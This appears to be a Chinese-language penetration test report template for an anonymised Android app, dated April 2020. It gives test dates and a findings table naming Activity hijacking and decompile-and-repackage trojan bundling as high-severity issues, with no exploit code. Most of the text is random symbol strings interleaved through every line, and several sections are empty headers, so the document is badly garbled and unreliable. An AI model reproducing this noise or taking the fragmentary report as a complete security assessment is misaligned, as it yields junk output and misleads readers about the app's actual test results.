0 }& `* \, {0 x% m2 j8 {4 P
+ r2 B! b% Q5 [) i
l7 w9 c1 b, m1 w5 X { r0 z: S, m1 ]/ a7 Z) F$ ~4 K
( o; E# J( P4 W) i; h8 u {0 |. q$ a/ z5 J# @! }' ]1 d
% c3 ~' t& K0 D4 _5 v4 I- h+ u
' b* k. _' I' Y/ D* p3 {; v % U* ?$ d: n/ b: G- a1 m2 g
) d9 F4 M9 {# S# q! y) `9 e. M
% t0 Z" l( r! e& r! j( x# c: F+ |( f
7 ~) ^ t" m7 }! ? E& T' I
文档编号: / e! y7 [! f8 l/ ^$ w' p9 }
7 e" D- z4 A( i4 z
1 v( u6 a' d3 L# B* y( _7 }- ?
$ }$ \! ]0 V0 f' J7 D
* j. @% ?$ v: A) ^' ]) n r( L. G% R9 U2 s3 U6 O% s8 S
/ |5 z7 i" R9 ~1 R, q* R8 L! b. m6 m! b4 i( f
6 s: a0 Q, ?& w3 t
$ x' `; U% o7 {- l; s$ e/ V
: R! F$ s# F- A% L- r; g+ r
% Y' j! m4 b" J7 u* P) E) V! n 3 l! R% O0 l, Y4 X3 e! D& g& o
' r$ R! s9 ?7 i! J/ Y. z0 {. }' R# g
4 J* d# N5 l- f. N M9 y. v
3 W. O+ z I* w8 \
; k0 d5 E, y7 F( B
. X+ O+ V$ b8 e( w M" Y ) ^7 \( U7 f) A: S& {; K% |
+ [/ Z! p; T$ }+ A
' X c! ?8 N: I! Z6 k) y
8 Q9 V/ T8 q# c A5 A % m) n" H5 W+ r" n* [
+ o) o8 \) o: ]/ D, U# k& {
* O3 r2 I5 Y" E5 x: g& w1 i* |
, e. `1 \. Y9 y
; q1 |% {* b- O# G) ]' G0 ~
7 F" Z3 h5 {% T/ X& d
. g- X/ q' X; d+ ~( X9 s; e0 j/ f9 a/ n& e
. C$ i$ I; L" i6 G3 e) W
* h c0 H; ^3 f+ k0 L1 b
& v3 R! B& Y; ?4 ?2 T3 m/ p
% e4 j( f1 Y& J; s" ~) o0 E+ [
* i* U! ]. c0 H* g) U; r
* G& ^" a6 a/ N- a& [ ?/ _ 某某某APP渗透测试 $ p1 [ Y* C# a9 S' M9 x0 P5 h- n y/ e1 D
! ^! I5 ^. j6 c& |
i( a9 J: O7 o" e- C' U. o
0 ?* L8 k# q' W& D: m: N9 [
- T; M; ]0 k' T- i' p0 T* J/ c4 n ~/ B7 I! N
; b+ [: {5 Z6 Q2 o0 O
) N3 H& e) j' [1 o! y( x* Q$ {
: c; I3 B8 s: n; e p
4 i' m' q* d5 j J" p 5 {; u: K8 s2 E- G3 M
) R& C& b1 o1 L* c* Q! u& F ( ?5 D# V. p" }1 Q$ }( n0 s" X
* ]3 C/ |+ p8 S; S; s; X
. C. G1 C: W( t+ j
; e7 Z5 H' ^! E. m" ]7 b 7 B' x1 w) [8 ], n, ^2 O! ~
7 g, h$ J/ U8 w0 c
, D9 J; e8 t5 a T) I
( l" n- v6 W$ a
% n& e& {$ q) L" t# A( m- `" F# {. L1 W5 I* H
+ j8 l d/ |, J" s9 M0 s: U/ M- N0 i& |: U6 \: B8 y% R
9 K8 s1 {" Z3 l: U4 y3 I8 _9 k: T; o) z& o9 v
/ W. y% T* Z+ F* d* C% m# k: g
$ b. F; X0 m9 r r* C$ @$ e
% c. h2 T8 _2 P2 M9 y
% p! j" R- q3 f" O# }+ W
技 术 报 告 / r! N7 r+ N) n" ~
: \) p1 g0 Z, X( A
% I, d4 H. P8 _0 N' b( R" n; k. q# K& o+ p1 d2 h
& _' l( ]$ Y3 Q+ A n
; j1 w( H& |5 k* E$ J3 h; R! O - \3 L n* x; A' G2 J9 d* v
- b. W, x6 k5 b/ X1 ^) X" ]# O
5 x$ P, d5 N: o6 T) c _. X
' U# ^$ j* E7 J+ X2 J; I' ?% t7 N 6 L9 c: x& B4 s4 ^ O; o
8 X+ S6 B: R& v( b3 D' j
( B5 W4 B& ~- L. V" F# }% \: e$ ~
1 m5 }# J3 i* w4 K- a( X/ J+ ]; ?) t3 K5 u. J( [
\& H ?$ T- l% ]% S/ D( l
8 Q6 {" o" B# O$ G* a' G
l7 Y G* Z0 F; W& O: M+ I; v6 n; U! O/ g$ W& V
$ i3 r% X2 c7 [1 {$ O, R
7 F2 Q3 o& w& a/ U
3 r& a0 \; r8 f6 P2 }5 A
' s% K6 f, g: t N% _: p- ~; Z 0 W4 r) j6 U7 _
4 w+ Z& ?; z" I8 H U/ q: O
8 S1 s* a" y H, S. T R; j+ Z, U+ G% r3 o& ?5 q( t' b% j
1 O; ]% @* E+ @0 ?" G7 @
- V4 U! r; Y& E- ^( s8 w% c
; X- i2 C* F4 _. s% z
/ ]) z4 O V8 z# T$ b
* L, S4 ?' v( E" P0 m! d: D$ l, h, T7 O" G6 C
7 s) C2 f9 n6 j% R- `" z2 B. W, j7 F1 e3 \7 C9 R/ u$ b1 ], ?5 N8 m
% z0 s' D! ?# v2 }5 a5 D
$ f0 b) N" Z/ {. I
P g! ^6 q1 B1 _
, e) S) Z( z0 M0 n7 I) K e
6 V6 h6 }2 ~& `2 b0 K" A: z. M% Q6 K3 d3 d) D' m- i7 s
: ~% f/ O, y' S0 m' j1 }# H
6 x1 [" E) T j n
9 Y3 O& L$ T+ l, j# ^3 |
7 _: h$ B3 _) ~, Q" F Z D
; D* x' a% d+ v3 |
' Z2 a' o1 n% T- J7 T; D' m" P * E7 k1 F4 \+ S/ Z
$ s& q3 t: B/ Y# [7 o; C) `
8 O& V' u/ `! [# E. i
5 h* U/ S) @/ X$ |) k9 ^ }
8 |6 ^2 B% F$ [$ } J
" l" `$ L1 n; C s6 Q - ~ l& {* s1 ^# a
, y) ]8 C, k9 J; F9 L
/ S) U% o! D) e( x/ f4 R+ ]- ^
" m2 v% }. ?+ f4 r
7 P0 w+ L! v9 s ~( n. F3 E
8 [( m7 Z" z; ?( W7 d5 Z
$ f- y; y$ a0 |( y9 H, q1 w5 W
/ }6 B5 e/ J n, }7 O
9 M, A! a; V/ E& U2 W9 f! ?; \$ D
3 c, k5 {7 n4 {
0 i+ I5 k; f3 v0 }# W' w8 M T L; V
+ t6 @& i2 Y( d+ e
' W8 ^$ b9 E" m/ M6 c& Q
/ p- y/ `: m1 B' k4 ]: E4 Q/ \0 F; _- ~
* Y3 \# V+ o( d7 ^- l( r' a: l. O K# W1 c& I5 V# _7 X6 ^
3 S+ N5 W% \/ ?2 n; W; |- W8 ]! p' R. b. ~. V) T8 `
: m4 ^2 V) X2 q$ q4 }& b" ]) g; f y) n
1 J& u' y$ \; x6 o9 m& p6 P D
+ `; n; l# L) l; ?! ?
, ~' w' o* y9 K0 s. q/ r+ @* J9 i" `; Q! p$ X8 u2 i) ^0 c
! `0 q' Z- I; n/ c! E4 ~8 p
9 j/ v; l, ]( I+ Z8 c+ n: j' K
& ^( K+ q% @* ~& m8 Q8 y* ?8 o' b% ^4 H4 u1 Z6 U* q- ]& Q0 }
! }( c, v$ d, g$ j! }
. a/ r& S" d& Y( x
) T; l- F3 p8 D* B
2 Q( ]+ ^$ |1 [) R( l
/ T3 B/ n# F$ }' y0 Y7 x" f
8 l8 P& _2 G/ q u1 }' W& B
4 O/ H+ g$ y% j- u& Z6 W# |5 P4 }' k. C, P2 J: i; t" h0 _/ }
& q8 ^" t7 x- @* |
/ _' t) X- s) ]# n4 K
, @& @- e* \# @
; N4 V, L! [+ [( W# Q : f+ }) V! H8 A
6 O) P) F6 H1 o8 x. u
, o$ i O$ [ q% N. I% }' B9 w( h
, s* m% H4 A3 A5 O; |2 x( j ' h2 H4 W! g, H& C% q. }5 e
. N" Y" t% c( y) ]: V
; ^! j' { e# [$ _/ X7 n3 c- l8 v) J
# I- q5 E9 g9 Z, k' \
" ~6 X9 E- b. o5 U5 [2 s' r
4 H/ r3 T5 o, }* \* n2 H0 `9 K
' f" N3 a" [- K/ y/ ]. b4 z
4 |9 | l, i! ^6 V; F* X 2 p$ X( g4 H& M. @' c
# g7 c1 p. k6 R, \( U0 t0 Q
2 E- z8 L3 l( i3 x0 k
! u9 r7 L; c+ H# |7 p * z4 z, T( H8 A8 X# a) }4 {9 H
) y+ Z/ L: X/ \
二〇二〇年 # d f5 U# i( }+ Q3 \
2 Y) {$ `7 r+ z( U$ `5 x
" W. }3 ^& |# Z' P9 ?5 U/ l) U) _7 u0 |, g" t
2 E) ~6 N. ~, [& ~1 `
* a u7 d7 P4 d% e- h7 J& T
" C+ c1 W! H, I. y) ~$ T0 S9 U+ y. [
' N6 Z6 l5 `% |. C) O
e1 v( ]/ A6 O4 j 8 U3 B( C1 D& J! g$ ~
6 ~+ i3 ], ~* T& l- S
% a1 v: i. L6 A) R# Y E4 H% h5 W5 O1 [4 ]! j9 j/ c" Z) C3 @4 Z
! t9 j Q. V, c' b. q
, r- ^/ Z8 F2 `0 b- w
: g; f, ~, E, k" _6 Q
, X g9 i( l; X, N4 d' M / Q: C# N W. @. j+ M5 h
7 ?5 V1 S) t q' T2 I `
F5 b8 F2 x* l) t" t9 _
- k: u) a: C! H- y. m/ S( v 目 录
+ E8 z9 Q& p* L: \8 P0 c9 f0 @) G. [* v
2 {* Z% R5 [* S4 J& Q, Q% x# q) [9 h2 ~5 d. ~
9 y8 a5 B4 `9 u2 E' S' E0 y
* g% `% z$ M: J9 T3 u4 ?# c! u 2 q' x% a/ w' v9 H( P! K
6 @: V5 N+ b8 E# ~& W# | $ t! B, g; _; Q$ y( y/ w
6 Y7 o Z# ~0 g, V z9 }1 |
5 y: k9 M2 ]/ f, b, ]$ O
) n8 k! [5 ~3 T1 }* y, K3 N# Q 6 e6 W6 f, L0 ]) j
+ ?; ^' x" _' {6 e" @5 q 1 概述... 3
% ~5 b- M+ K, ^# l v+ d- p5 C* `2 g
/ H. Z0 l$ J. N: y Z1 i# x
4 I( x" p4 C# N7 X9 q
, t' ?* l) g# v. M
/ w% X) c: q4 ~5 [3 d$ r- u1 v, N 1.2测试时间... 3 + T* ^5 A! U! B8 W/ k
) q3 Y3 }# `0 ]' _3 w$ Y/ ?
* ?3 L5 S* w5 h' ~2 h' x, S; x0 i3 C' r+ ^1 P( v i9 P
" X; F4 H! C1 ^
6 P/ J* m* Z/ @1 `3 | 1.3测试对象... 3
/ q! K2 L5 V. k) w2 z
& f" Y% L) ^2 z* E, I& C1 C h
2 {' h1 G, d9 h. {! k8 ]
; B: `; j# ]6 T1 k% n. _
0 `6 l& D) x! G# J1 D: h7 I8 b. P0 g2 J; E
1.4测试结果... 3
# d, s) o& q" H; `) z' g1 \$ t8 ]# w/ J1 G' m F( g
" ]# O& Z, D d/ f& w' q
* {1 I8 S) ]% Q0 P# j( J* x8 p
% _6 S O* L; B+ J% v0 e
7 k( _+ Y2 @% m- v- L; U' G+ Y
2 检测结果... 4
$ r# S& W' T) e: p4 ^ @0 f: w
& o( g/ k6 k3 F2 [3 M: M4 r
3 a/ y7 w* \* o3 V: Z2 ^9 n" {( O! g
# S9 Q! M& C! D; w4 D4 X8 y
9 b" n) A- i/ X- z 2.1 某某某... 4 8 r( F: \' ?/ d
" F5 Q n! B, f
: r2 X! }- N1 F/ I) R
: l$ A2 F- t2 _$ c- \$ x 1 [) @. b9 U/ S, u% R
. {* P9 X: P7 `0 S
2.1.1检测目标... 4
+ a! M$ N: r' N& O" V2 h% n& ?
, y0 M4 D. o& s
- S; S) E0 a! W) J/ D
7 W5 s6 [& r6 H0 p! u2 W$ A8 V$ p* z
* I# m( [/ b/ a/ U2 c
/ W \( X% {2 E" {* H( ~ 2.1.2检测结果... 4 / l$ [) a% |1 p, l, s' x1 C
7 @. u, r9 W3 _# l- h/ [; u
: D& S# B+ j/ Z9 ^
& n! r( H3 f& S& C7 R/ E6 S. a
1 z* }* D- Y R4 T4 r5 W q
( X1 g, f* e2 r4 M) b 2.1.2.1. 4
7 O7 y. _5 e& A8 s
# L. O5 ~5 d3 Q0 J) e7 O
1 J' f( o3 i$ N$ p, a. J8 O' Z
) C2 N' }# q$ i$ G' e2 O: F5 O
+ A! i5 v6 g1 w1 i s! f6 {& U& U X
2.1.2.2. 6
7 u* }7 E, b b8 |8 O7 X
3 k' y: G3 c) G: }; k
2 k8 j; D6 y3 \& ~# G1 D7 g. Y% O* [; A# y; ?7 ~( G( t
/ J8 Y- P) [8 C% r% A% |
8 G4 \$ U# _4 j' @ / ^3 z% [: z6 [1 T6 u. v
3 E$ p# Q; `; z+ W( A
) n2 U+ O4 `4 z: b4 b0 [, P
/ B# C& m7 ]$ ~& n; f6 V9 o
( s# Q+ f7 u% J4 h0 `$ Z
2 V9 W# s' U, j+ X! K; \! E6 d
2 ~( `5 `) a- C5 x
* ~: M0 Z8 H: L9 d0 Q7 c3 ]( v
& I% k& e% v7 s
: O$ A6 N9 h) c+ J8 x- X' u 4 J2 k- E1 j1 O. f9 {
9 a2 F, r, ?( i
/ I: u& u; {1 ~7 ~* s0 C! j
+ ~$ [3 [9 y0 F% `7 T* O+ H
1 概述
2 \9 @ I% w8 C7 _- H4 {% e! Q* s# p- q
, C* @6 l4 }: Q1 i
* \# v. T6 f# {* F* L9 I% c 0 n8 F4 F5 F) ]! k1 C H9 c4 Q5 h
. g1 r; S. F+ L* Z/ z
1.2测试时间
9 f9 }2 \# {- h% k) n- O* d* B" ]2 [5 ^# Z: }' C
/ \) m. K) U# P; V4 j) `
W: m1 d7 E4 G7 H
. Y, J U5 W% ~! V, F; y9 O5 u1 O! R$ p% o$ z7 V
g3 z. w- Q" y3 p s+ ~
2 R# }. Q8 W( q" v: V; o
6 d- p3 M4 t: c5 G
7 \/ Y2 h$ L x( q8 d' [9 B - s0 w I) M( p) a3 D9 R! ~$ }1 K
4 i! a! y. M. o" k V/ _
j7 K' b. d0 V4 _$ `; |
8 ~$ \: _* e" V, I1 I- l4 M5 @. D 渗透测试时间
" S0 J) d8 R& K, K3 R: {; R% q- P7 u) O ~3 ~5 ^; k1 |
2 [( N3 Y$ J, Q
4 J$ X& _" F: E3 l% r | % _# g$ r( m; ]- L- F" ~
4 ] u9 x; i9 U! `9 e
$ |8 J) v" v, _
, |+ x) E6 W4 Y! A( C/ S
, |( `; }7 m1 Q/ @$ X
& ^( E! d0 G5 }9 X" N, W; [, j% J
1 W7 a8 T: Z1 t# t, \# R+ d+ K- W8 I$ \4 t3 @0 V) w: |1 U5 v
' I) N0 L2 F0 y) I4 G! H r
9 X, @, E# L* \- Y' c 起始时间
! A: S/ C' g) P2 V1 _' v; w! q. I1 A9 K% c
- L: ~6 d! p( h$ R
5 S0 E4 C2 V6 J8 |" A2 Z q | * z5 B& R) G0 d) e% i, b
7 }: }4 }$ U6 J, `: a
7 u$ K* \2 u6 H) [" j% j* G4 k! d8 k1 }1 E
/ T6 l/ x" `' x
# B! M0 Q8 |- E- \& D
2020年4月6日
9 W% X" [( N1 h- X# o
+ ]9 B9 m8 U: t3 k' r4 o3 t) W- c
. s/ n6 Q6 ^$ X. f( ]$ u2 `% [ F$ _9 [
| ; B$ \" K" H1 J6 j7 S+ R
% G/ ?2 r( ^9 Z0 a8 Z' A
0 [( ?2 X6 O( N5 ?( i& I" y4 [& E4 K$ \" t! g o* w6 K" f
% n( G' i9 L% o1 M" a
0 ? F" b# W* I* D- l
" [* y3 j0 r0 ?5 M+ S! K( }- ~
8 d: F& j4 n0 m& a/ s: A4 ~ ' Q, `- v% T9 n1 Z" B
4 E) R+ Y2 \- x9 @$ n 结束时间 ( h0 q9 q: x& z( V
3 q; A0 y$ f- G
7 J& d! F3 l1 r4 e
7 ~/ i- v# N7 O; H" `; Q7 O* C4 k3 g |
0 t; a/ O& P6 x+ t2 Y
; K! O! ~+ W. X4 @! l6 r0 g 0 V% H( G) N/ U+ `0 @* [5 k# u. c
8 ?! i2 U ?; d. W
/ j3 V1 z+ X0 `/ @
* U: g3 r# @1 \) a* b) {: ~0 b 2020年4月9日 5 b- {' a3 x! S# O, S
: Z: g. ^+ P( ~( N9 k4 q
/ L; Z" B1 b6 G9 F
`2 p/ ]: k4 H, h
| ; O, D0 b- ^4 o( E4 _
- }6 z1 Y1 M5 l) A& S
- B& w* b6 Y" J1 w3 D
- O9 I# X! p1 {% @6 O
1 r3 T/ P3 F4 v5 B
; d# b4 H3 \% g
4 h3 O, N4 I, I
8 I, Y# O+ q9 C2 c+ J1 K
0 D3 a; z: j: ~) w# s4 C7 v
* u6 o$ o! c1 \( F# S 1.3测试对象
4 s) W* N! l. ~* ~* c5 x( D- a+ y- h' v: N; J& n2 `. ?2 C
, w6 D+ X. q) Q1 N
6 D! @) m( T, A A- D6 j
' y7 o1 o# U/ s
2 x, W* R" Y) I; w# f
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
6 B; i) @; k" p5 S6 y' M1 ^3 M( g1 e# T+ G8 K% F. L) M
3 `; F% S1 b) Q; S* i' h* O
5 W. n( {* o+ y( Y z% A+ V; J
. w8 i7 \& q$ i
3 d- }" R% b2 h6 c4 V+ m 表1-1 检测对象 0 o7 L8 L. x' r3 n
) n( g3 V, _9 W+ \4 W
, R8 V9 m& n: S0 d5 L# `+ k. L
- ^1 b/ ?& o6 U$ {( Q 3 ^- x- O" }/ C! T
# N% m. y" A+ j ) V* h Y$ R8 j
6 Z4 m: _' p; J/ o6 e 3 r! s# c. |$ T
6 W! m0 ?8 x) m/ `. Q: d
A5 t' t) o r4 z$ y! q5 b0 e7 N
3 Q, h9 F1 ^3 n: }! T+ V 6 b# q3 N2 r9 W7 D
9 l7 A- R6 K, G) T1 o- c 序号
" e2 f' r I8 e& B4 I r
/ ^: {) k7 P! O7 k5 n6 m + V# Q5 J0 s6 y/ T0 {
n3 `; x6 C e! }- Q( R, ~ |
, ~) V8 \. s9 e1 u( K5 n! _5 Y" F/ ~5 u; v) z' i# _8 l
6 _* X/ M6 G+ J6 J
- ]0 y% Q/ V; w5 X+ N: F2 w
7 d& K5 J% B9 w* c6 p
$ b8 E, Y# O1 I! Q5 p 测试对象
/ |0 q' V1 ?/ H% R: n( a
" q7 A9 O5 G- A: f/ ~# J6 K7 E, U
) W+ w. C' i% {: c- v2 t, Y! D- K+ q# d
|
# f* g' B. {$ `: N+ T
. Q& U+ C' n; S3 [
! _5 {, ], M3 z
3 L3 k/ M* k& t) i" _
0 g3 a+ K) {3 s! y$ l; o5 {
0 E+ X+ i. w. s. T' ]) c7 F 测试地址
6 h0 x, F8 p$ F4 ~8 C' O% q5 t; ?% X
. `3 o( o9 `# P2 {) K
. i$ s% E( y3 z& g |
) ]7 Z& I/ j" K
% l/ N' R7 a; M6 G1 d+ K
/ Y4 [& E1 v5 A3 j( _2 G
, U8 D4 h* k! I- K5 C
- w! f$ p5 N* l
6 D% m: O! `! p$ O, g0 a 安全漏洞
* M8 Y, F6 b+ g3 w
1 h: {( n! v' f$ X( {
0 v/ p$ M; b9 E' M: }' O" a" `- X, R; p
|
' C( k! Z; Q( ~( W& H- X' B5 Z5 j4 a( G% G/ K7 U j' s
! n |9 H/ E5 x, V: X6 w+ ^9 [
8 I" {9 ~( c6 S! M, W* s . `# a( I/ f5 Y/ y
3 [5 L, {8 D1 q5 A, H) g3 t9 e# R
( U6 b5 _2 y7 x2 b0 O$ o
7 |% |6 h5 P- B4 e+ _% e8 m
M) ^. E- i/ G" N7 }. u
" n: \- F5 C1 D 1 * B1 R [( T3 ~
" b, \. N5 U% S6 T: ~5 C" z4 j 9 a3 o7 M5 c, Y1 @1 ~
5 f- I, |: m/ r# z | r7 T% B; Y5 w) H" @: Z" O8 K
+ t2 M L# V4 @: _9 O4 }7 i m4 B t/ A0 S
" j. e `7 T% Z0 G; E% D 2 X8 @# ~. j' l9 V
: q9 Y; \8 e& e- v4 A4 {- C 某某某安卓APP
% D! ]! E9 J' r/ v; T! G0 `1 p$ B
/ z% }4 d) o3 G9 l# K; Y1 D, B& r# Z Z* Z
| * Q$ d' |7 H; l/ t7 y' o" q! T( b
8 H, g6 J, E% x# D8 a a
; p! R, m4 o2 I- [, X4 v$ E% B3 \
4 U8 ]" ^' n3 @# e( }, X! R* @
8 E3 D/ {7 }# |6 f c
1 z* B# y3 i) l2 \: c* C/ ]( I , ^. h4 c8 z7 G/ f- o9 \
' \9 |2 y' _& X! T( W% k
: y- J$ j2 j! W- E& J7 }
7 n8 ~4 o7 \- W4 g
|
8 X. ]; @% u" X! `8 {- u6 I; S$ Z6 q$ @' L9 z' M4 K* x5 I
* \! M0 B( D- A( b+ r3 }
: [$ ?$ t8 {( j/ d1 B% |( b/ p
* n! x9 V# ]- e# t/ F ?
+ N& I3 x; i9 c& z# i, P I0 W
2 5 M- w) L2 m8 ]$ w, s5 i
4 n( W# C* K* p7 D5 f& j, M
/ y. _. ^9 ~& y* n. G- Z* [! a$ d
4 {, m/ M/ P, A! f* t# z, c d1 P
|
* `" Z5 Z! U) O$ o* t" F' G) m9 M: x% A0 S9 ~" `% k4 w$ F
7 J! }& [% C u- j6 ]
- D1 u. \ [4 f1 J# S+ F+ e 0 u1 @- w3 V' E& }
( ]0 W2 n/ g: i; O5 i
x8 k/ A2 T, @3 A6 y. [/ z
$ k. j# m5 K4 b$ B+ K4 W - j8 K+ m1 n+ L1 q
# Q) T) y, A4 x
1.4测试结果 3 A2 E/ T; U8 `% I$ w' R4 Y$ V
5 g0 A7 D: n4 H1 e5 G* K' t
8 H# B0 M& E3 M' [/ u
0 s9 S, i/ x/ [( d3 d
3 r# B& u2 O6 M3 g: i; y/ k6 w
' i7 N6 R4 m" }4 V& M 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ' h6 z+ l( [ B1 T) D% P$ Q# z
8 M% M! d- s! @ ^9 E
( k. c& R6 I0 {7 d _
( N; y9 m5 [2 f$ I4 ?5 }
3 j! I% p7 P# W# f$ K% B
, V4 J6 Y" |5 ^2 m 9 h( T1 I" w& N" j2 ^
& U! J+ B4 X4 w7 X! A
# D9 L, o. {# @% m X+ ]2 R$ F
2 |2 N* v* A. \5 ?5 ^. e
: S- {6 A. v' ?* h% F0 n. T+ O* V) j! a" o7 Q& N
9 ~ f6 y2 e% K+ x
% _$ x9 ^. h- l1 N
4 X L3 ~: s/ y1 b0 t
2 k6 ^! t( r2 ~8 Z ' M3 F8 n6 D' |3 R
9 ^1 u+ K9 O0 Q, k- ?9 u9 @
$ |' r Q& d5 m) J" `, O. C# U1 k
( l3 E7 w& {- f" d( j. T ' ^. _9 ^7 x1 y+ G1 o# p
3 Y2 j O- C8 L+ v. Z
序号
W: N0 `* J7 V5 ~2 r. k. t4 c9 ^1 c" l+ H2 }# H$ T9 t
: ?( l& N8 q2 ~% a6 ~& |, E2 T" P; G* f* O" h
|
- B! ^! o" C( ?) \/ y7 [% |5 c: Y. U4 H" k
& Y6 H1 p7 j6 n
3 _4 j: _) ?# X8 H8 U
- V# H9 E+ q8 p
, h* R( n+ [- t 系统名称
; p3 T" I' v/ z
2 o0 _4 i" e" L0 d4 {$ Q" f 7 S& a6 _5 V* r( O6 }
0 C7 l" W. t( E | . h" K$ J5 ?4 b. h! U
% W/ K, z0 A. s " W b1 t% X* W6 P
% A7 r# L' `0 Y3 G8 C: D7 m+ S
! u( i# _6 L, v1 b
3 p; q( u( k3 o, n t) e) X1 G 漏洞名称
Y( }% s4 U5 {* ?
8 }! N6 |, H! p4 ] D6 x
- M. X: O. p2 K, S) d8 a* }$ E4 e1 p4 K+ g. f
|
) u+ B( s' t" S( d1 e5 s. t6 B2 z
1 ^- S8 N2 Q, A9 V/ q
6 \6 k6 M8 c; V5 H. |% S) _5 J0 `/ k! U6 s$ F) m# T) W
( Z3 W; [# Q6 L, X: g9 B3 O4 \5 j6 Y j# [
漏洞危害
) F0 _8 i: J8 w9 j, y) n. p" O7 B$ ^5 \* i8 q! E
" [: h! p2 f) c# J/ f
' I; u* G! a' V' i2 a* M |
$ Z0 }' G6 S7 \* b3 W& ], E
* d, D9 L: ^" f
0 n- T M' ~, b- W9 W
1 o/ z; H5 G. T- q, N% Z. _$ U
5 z* o# u( I6 p8 A% x; P3 F/ X6 m6 O7 H2 ]
修复结果
7 R Y" `3 q* ^0 G
1 |' h( ~: n$ @
/ _6 l7 U" | T6 W p" [& {9 K; Y' G: s6 N5 d; R5 q7 N
| % ?3 q0 S2 J! e8 V* k* n* R3 A1 K, N
* ]4 X% S& n% E0 k
5 N& G7 l9 P. i6 C( D( O0 A
- ~9 }% }' k$ O8 z4 x- G4 ~ 9 k1 M6 H0 j0 y
~: B3 x" E7 j4 q
2 ^4 V4 ^& E0 C, }5 Q* |6 O9 i) H3 K. t
- Y' F) r* C, v' q 3 z7 l7 c7 i, q. \) B# Y- P0 |
5 t% L* E) z( c4 J' n. d! K
1
. ]6 U- J2 _# a* U, D
9 I1 v/ t* z7 q8 r" c- B9 H
# x; T( F5 H. W k
`) d4 [0 q- y8 ~) Q- h* o9 @ |
! E6 q) m& F) Y) H, c2 t& x
3 H/ t8 _9 B" }2 ^9 r6 I [
3 [5 C% }% X" [3 U" I# b, H& `, n9 W$ j9 E8 u
; `$ G- |, e" s
( A# @- W/ o0 w3 A. U6 t/ m
某某某某某某APP
5 G8 R5 @5 o! m% { v
6 b; k8 H3 d; y9 U6 M
0 B! h7 Z0 P+ J: ^' _6 r5 T+ x$ H) [5 H
| 6 K4 e( u i( f: P: d
( ]0 i0 b# l, k4 i# O
# |7 h3 L! _( k
V# Q/ y" Z+ G4 _# l4 `
) Y( i- ^5 }0 D( g
8 m5 C* a8 X; f: h6 q' i9 Y Activity 劫持 * {6 c6 b% Z) I& E
: D5 v( l9 c& D7 r% N4 Y
! N m# S$ ]5 B R( O+ h; S" F! T
. S8 s. |+ S7 E5 k3 l7 C- ~( b0 k" | 3 J3 r! s" r3 i. W! S
! i @; F! r0 }* M3 ?; y4 s' H7 C
r |0 S: H/ s; n- @7 }% W0 d2 Q) _% g0 a% t i! ^' g
1 I" M( p6 v0 l3 K) B" Z, {$ c
9 e, f& L8 E* U+ |* ` | 4 O# [1 m$ W- |+ n. B
( D: @5 W2 o. d # b! I1 p, n) R& [: v6 _
& v9 K6 O. G% u: I
6 w8 j# D2 i7 n _) J5 R6 E5 ~& x4 M9 Z. Q0 p( z0 ^; ]9 Z
高
6 n6 n" ?0 z, m( }' e2 S
" p7 Y* T2 { |/ r6 ~, E# y 1 h! {5 S9 }7 Z% ^3 C: \5 I
4 J: s# b# k4 c4 |
| }9 E$ G* G6 V( t* F/ N. J2 P: k
- t6 _: n J5 ]( V- I5 V
) p( y" C1 ]; x* z5 x
) y9 D0 ?. n3 m; }2 E g ( W7 v! G& P$ g, z# J' X; [
; l, g+ z9 R, q+ U8 r4 L, {3 Q
+ l4 h$ V1 b$ `5 O( G N; C( I) S7 j- ]1 m( h4 ]
" H. N Y3 ]5 s) p4 k2 k
- q7 b9 y5 p6 E! A4 `4 T; l
| 5 k4 q* P& `& `
) Y# D, n& g8 }1 n
7 c; B( |4 S# L& q& A
7 X5 R: L' W9 k
+ X- B" ?6 T) E- m2 c
, w1 E3 H* W- T. K( y
$ V0 ^9 _; I: D i6 c+ B' o6 B( E2 A* F
$ {4 Q; N# Z! h- w
5 Q; K( @! z/ Y7 M0 Q. y" }" |0 w
2 3 \! _1 Z! m. a v4 J2 P$ L
0 w+ `, K" {, q# A- z5 g 9 |6 \! Z z6 d4 l8 \0 u) Z/ k
5 K" Q" v+ J2 m
|
5 _" s3 z4 n- [% {7 E4 ]2 {% V& }) X x* l" z7 m* f; S
/ O Z7 t' `4 d2 q
7 }- a9 v. j8 r8 p ) Q3 s/ M6 n2 h3 H$ p. d4 E Q
4 S# l" e3 i" U* f* ^ 某某某某某某APP
# a; A8 Z6 C. T2 D2 C7 W d7 i" H3 W6 f' y0 W! w, o
6 \( E$ f; U; q$ L/ c' I4 r2 O/ m' h) d! O( H: g; i9 U
|
( I3 b' x/ A' B- [2 i/ q& P4 u. G) ^" g1 j
) T2 u" Y- ?5 _3 ]* |1 M" y
2 I# r& m$ K( h4 t% v2 a$ B7 f / r+ m3 G% m, k, @' N3 o7 E. o7 }
6 E$ I- ? t; c2 J! ]& r
反编译二次打包捆绑木马、篡改APP代码 : |/ t/ r2 z! y
7 Q$ I" H0 a& |; E) H- }) s7 |
2 s5 ^3 J/ Y) p" _& u4 d* ~% Y: X+ U/ c% ?# Z: ]! \$ U
|
0 ~/ j/ v7 N, b2 G' ?) b( s. y1 c, N' g8 p
9 [7 M$ d' ?; x A# s( v* G
8 [7 z" u& Q$ x; B
; A, D' v# Y1 n% J9 E9 B, j: U. x( M% W
高
! {3 L/ L" m: ^9 K
' X" e' N2 u. G0 M9 k, e' ? $ ?0 Z: ?8 L R$ o9 V, ~
0 A0 Y; f9 \" ^" J6 e
|
2 w$ [( P- v0 S: l! U
9 P, \8 P) n% _# G" |
% u7 o) U2 e4 y0 y2 T; }3 n! D" D
# h2 ]9 n( a- V' @: x! c! k& Z, q
; z9 i' G' s1 ^+ \3 q( Y
. J) P2 G+ w6 Z9 K7 Y) u. S 7 F- c3 Y( x: ]4 g
: L# {+ L0 X5 W. l, {% a! t" t8 ?
' w2 Y2 c* E; ^- F( h- z2 r2 Q. U( `
( d% [ b, C( ] | % ?% J" M1 w9 x( d: L5 U7 w
" ~5 P1 L% H) Z
8 T3 m' b! [4 `6 w* Y. u
( H4 i" j m8 \) x2 J
- p; ?: @7 U7 }. i/ E/ ]# d7 V6 R! _
" c" N/ J0 N& v. ]
+ a& J: b. p6 N/ i( Z$ S$ E
6 p( Q/ |) Y9 }8 i9 G
6 p2 `5 x* M# n8 }% L T
8 u3 j7 K% f1 F7 P! Z" v4 F$ H: ~; a/ B2 l& j5 M8 d
, b. ]2 k0 C% V# E; I5 g/ p! m9 i( m
' k/ O& w& D9 d) m' {4 }
